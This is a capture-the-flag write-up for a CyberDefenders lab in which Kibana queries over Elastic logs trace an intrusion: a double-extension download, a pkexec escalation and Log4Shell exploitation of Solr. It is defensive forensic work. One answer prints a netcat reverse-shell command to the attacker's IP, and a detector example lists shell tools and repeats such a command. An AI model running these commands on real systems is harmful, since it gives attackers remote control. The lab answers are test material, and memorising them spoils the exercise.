Cyberdefenders ELASTIC CASE write up

Orhan Öztaş
Jun 4, 2022


Cyberdefenders is a great opportunity for cyber security analysts. The platform offers many different rooms for investigating cyber crimes. One of them is the Elastic Case room, which gives you a server with an ELK stack already deployed.

Let’s deep dive into the ELK stack!

We download the c71-ElasticSecurity.zip file and extract it. With VirtualBox open, we double-click the .ova file that comes out of the archive and our machine is ready.

Zip Password: cyberdefenders.org

SHA1: 0eda6605d309486110f012bc8dc73e4652059b04

Access Kibana interface via http://127.0.0.1:5601.

username: elastic

password: elastic

#1 Who downloads the malicious file which has a double extension?

We can see the malicious-file alerts in the Observability > Security > Overview view. A double-extension file looks like orhan.xml.exe.

Use this pattern to search for double-extension files:

filename *.*.*

  • Answer: ahmed

#2 What is the hostname he was using?

The same view shows us the hostname.

  • Answer: DESKTOP-Q1SL9P2

#3 What is the name of the malicious file?

The same view also includes the filename.

  • Answer: Account_details.pdf.exe
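The `filename *.*.*` search above matches any name with two dots, so it also returns harmless files such as `report.final.pdf`. The following added example (not code from the write-up or from CyberDefenders) runs both the write-up's loose wildcard check and a tighter "document extension hiding an executable extension" check over a handful of constructed ECS-style events, so you can see which events each one flags. All user names, host names and file names are constructed sample data.

```python
"""Flag downloaded files with a double extension in ECS-style events.

Added example, not part of the original write-up. The Kibana search
``filename *.*.*`` matches any name containing two dots; the tighter check
below only flags an executable extension hidden behind a document
extension, which is the shape of the lab's ``Account_details.pdf.exe``.
"""
import re

# Extensions Windows will execute, and the document extensions attackers
# usually put in front of them. Both sets are illustrative, not exhaustive.
EXEC_EXT = {"exe", "scr", "com", "bat", "cmd", "ps1", "vbs", "js", "msi", "dll"}
DOC_EXT = {"pdf", "doc", "docx", "xls", "xlsx", "txt", "jpg", "png", "xml"}

# stem.inner.outer, with short alphanumeric inner/outer extensions
DOUBLE_EXT = re.compile(
    r"^(?P<stem>.+)\.(?P<inner>[a-z0-9]{1,5})\.(?P<outer>[a-z0-9]{1,4})$", re.I
)

# Constructed sample events (ECS-like field names; values are not from the lab).
EVENTS = [
    {"user.name": "alice", "host.name": "DESKTOP-AAA", "file.name": "report.final.pdf"},
    {"user.name": "bob", "host.name": "DESKTOP-BBB", "file.name": "Invoice_2022.pdf.exe"},
    {"user.name": "bob", "host.name": "DESKTOP-BBB", "file.name": "setup.exe"},
    {"user.name": "carol", "host.name": "DESKTOP-CCC", "file.name": "photo.jpg.scr"},
    {"user.name": "dave", "host.name": "DESKTOP-DDD", "file.name": "notes.txt"},
]


def matches_kibana_wildcard(name):
    """Equivalent of the write-up's ``*.*.*`` search: two or more dots."""
    return name.count(".") >= 2


def is_disguised_executable(name):
    """True when a document extension is followed by an executable extension."""
    m = DOUBLE_EXT.match(name)
    if not m:
        return False
    inner, outer = m.group("inner").lower(), m.group("outer").lower()
    return inner in DOC_EXT and outer in EXEC_EXT


def find_double_extension_downloads(events):
    """Return (user, host, file) for every event with a disguised executable."""
    hits = []
    for ev in events:
        name = ev.get("file.name", "")
        if is_disguised_executable(name):
            hits.append((ev["user.name"], ev["host.name"], name))
    return hits


def noisy_hits(events):
    """What the bare ``*.*.*`` search would return, for comparison."""
    return [ev["file.name"] for ev in events if matches_kibana_wildcard(ev["file.name"])]


if __name__ == "__main__":
    print("wildcard *.*.*:", noisy_hits(EVENTS))
    print("disguised executables:", find_double_extension_downloads(EVENTS))
```

In a real index the same logic belongs in a KQL or EQL rule, but the comparison shows why the answer to the first three questions is read off the alert rather than the raw wildcard search: the wildcard also returns `report.final.pdf`.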

#4 What is the attacker’s IP address?

  • Answer: 192.168.1.10

#5 Another user with high privilege runs the same malicious file. What is the username?

The other username appeared on our previous screen.

  • Answer: cybery

#6 The attacker was able to upload a DLL file of size 8704. What is the file name?

We will use the file.name: 8704 filter for the answer.

  • Answer: mCblHDgWP.dll

#7 What parent process name spawns cmd with NT AUTHORITY privilege and pid 10716?

  • Answer: rundll32.exe

#8 The previous process was able to access a registry. What is the full path of the registry?

In the Kibana Logs index search, use process.pid : 8856, then pick the registry.path field from the selected fields.

  • Answer: HKLM\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled

#9 PowerShell process with pid 8836 changed a file in the system. What was that filename?

Filter: process.name: "powershell.exe" and process.pid : 8836

  • Answer: ModuleAnalysisCache

#10 PowerShell process with pid 11676 created files with the ps1 extension. What is the first file that has been created?

Filter: process.pid: 11676 and file.extension : ps1

  • Answer: __PSScriptPolicyTest_bymwxuft.3b5.ps1

#11 What is the machine’s IP address that is in the same LAN as a windows machine?

The Windows machine’s IP is 192.168.10.10.

Filter: host.ip: 192.168.10.0/24 and NOT host.ip: 192.168.10.10

  • Answer: 192.168.10.30

#12 The attacker logged in to the Ubuntu machine after a brute-force attack. What is the username he successfully logged in with?

Check Security > Hosts > ubuntu > Authentications.

  • Answer: salem

#13 After that, the attacker downloaded the exploit from a GitHub repo using wget. What is the full URL of the repo?

Filter: hostname: "ubuntu" and process.args: "wget" and username: "salem"

#14 After the attacker runs the exploit, which spawns a new process called pkexec, what is the process’s md5 hash?

Filter: host.name: "ubuntu" and process.executable :*pkexec and event.action: "uid_change"

  • Answer: 3a4ad518e9e404a6bad3d39dfebaf2f6

#15 Then the attacker gets an interactive shell by running a specific command as the root user on process id 3011. What is the command?

Filter: host.name: "ubuntu" and process.pid: 3011

  • Answer: bash -i

#16 What is the hostname that raised the alert signal.rule.name: “Netcat Network Activity”?

Filter: signal.rule.name: "Netcat Network Activity"

  • Answer: CentOS

#17 What is the username who ran netcat?

Filter: process.args : “nc” and event.action : exec

  • Answer: solr

#18 What is the parent process name of netcat?

Filter: process.args : “nc” and event.action : exec

  • Answer: java

#19 If you focus on the nc process, you can get the entire command the attacker ran to get a reverse shell. What is the full command?

Filter: process.args : “nc” and event.action : exec

  • Answer: nc -e /bin/bash 192.168.1.10 9999
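Questions 17 to 19 are one query (process.args : "nc" and event.action : exec) read for three different fields. The following added example, which is not code from the write-up, does the same in one pass over constructed ECS-style Linux exec events: it keeps only netcat launches whose `-e`/`-c`/`--exec` argument points at a shell, and returns the user, the parent process and the reconstructed command line, plus a flag for the case the lab shows, where the parent is a service process such as java. Host names, the user names and the IP address (198.51.100.7, from the documentation range) are constructed.

```python
"""Pick out a netcat reverse-shell launch from Linux exec events.

Added example, not part of the original write-up. Events are constructed
ECS-like records; the IP address is a placeholder from the documentation
range, not the lab's value.
"""
import shlex

NETCAT_NAMES = {"nc", "ncat", "netcat"}
SHELLS = {"/bin/sh", "/bin/bash", "/bin/dash", "sh", "bash"}
# Parents that should never be spawning an interactive shell helper.
SERVICE_PARENTS = {"java", "httpd", "nginx", "php-fpm", "tomcat"}

EVENTS = [
    {"event.action": "exec", "host.name": "centos-web", "user.name": "solr",
     "process.name": "java", "process.parent.name": "systemd",
     "process.args": ["java", "-jar", "start.jar"]},
    {"event.action": "exec", "host.name": "centos-web", "user.name": "solr",
     "process.name": "nc", "process.parent.name": "java",
     "process.args": ["nc", "-e", "/bin/bash", "198.51.100.7", "4444"]},
    # A legitimate port check from an admin shell: nc, but no shell argument.
    {"event.action": "exec", "host.name": "centos-web", "user.name": "admin",
     "process.name": "nc", "process.parent.name": "bash",
     "process.args": ["nc", "-zv", "10.0.0.8", "80"]},
    # Same command line, but a process-end event, which the rule ignores.
    {"event.action": "end", "host.name": "centos-web", "user.name": "solr",
     "process.name": "nc", "process.parent.name": "java",
     "process.args": ["nc", "-e", "/bin/bash", "198.51.100.7", "4444"]},
]


def is_reverse_shell_args(args):
    """nc/ncat launched with -e, -c, --exec or --sh-exec followed by a shell."""
    if not args or args[0] not in NETCAT_NAMES:
        return False
    for i in range(1, len(args) - 1):
        if args[i] in ("-e", "-c", "--exec", "--sh-exec") and args[i + 1] in SHELLS:
            return True
    return False


def find_netcat_reverse_shells(events):
    """Return one record per exec event that launches netcat with a shell."""
    hits = []
    for ev in events:
        if ev.get("event.action") != "exec":
            continue
        args = ev.get("process.args", [])
        if not is_reverse_shell_args(args):
            continue
        parent = ev.get("process.parent.name", "")
        hits.append({
            "host": ev["host.name"],
            "user": ev["user.name"],
            "parent": parent,
            "command": shlex.join(args),
            "spawned_by_service": parent in SERVICE_PARENTS,
        })
    return hits


if __name__ == "__main__":
    for hit in find_netcat_reverse_shells(EVENTS):
        print(hit)
```

Filtering on `event.action: exec` matters: the same process also produces end events with identical arguments, so without that clause every hit would be counted twice and the parent chain would be harder to read.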

#20 From the previous three questions, you may remember a famous java vulnerability. What is it?

Ez

  • Answer: Log4Shell

#21 What is the entire log file path of the “solr” application?

Filter: log.file.path : *solr*

  • Answer: /var/solr/logs/solr.log

#22 What is the path that is vulnerable to log4j?

Filter: log.file.path : *solr*

  • Answer: /admin/cores

#23 What is the GET request parameter used to deliver log4j payload?

Filter: log.file.path : *solr*

  • Answer: foo

#24 What is the JNDI payload that is connected to the LDAP port?

Filter: log.file.path : "/var/solr/logs/solr.log" and message: *jndi*
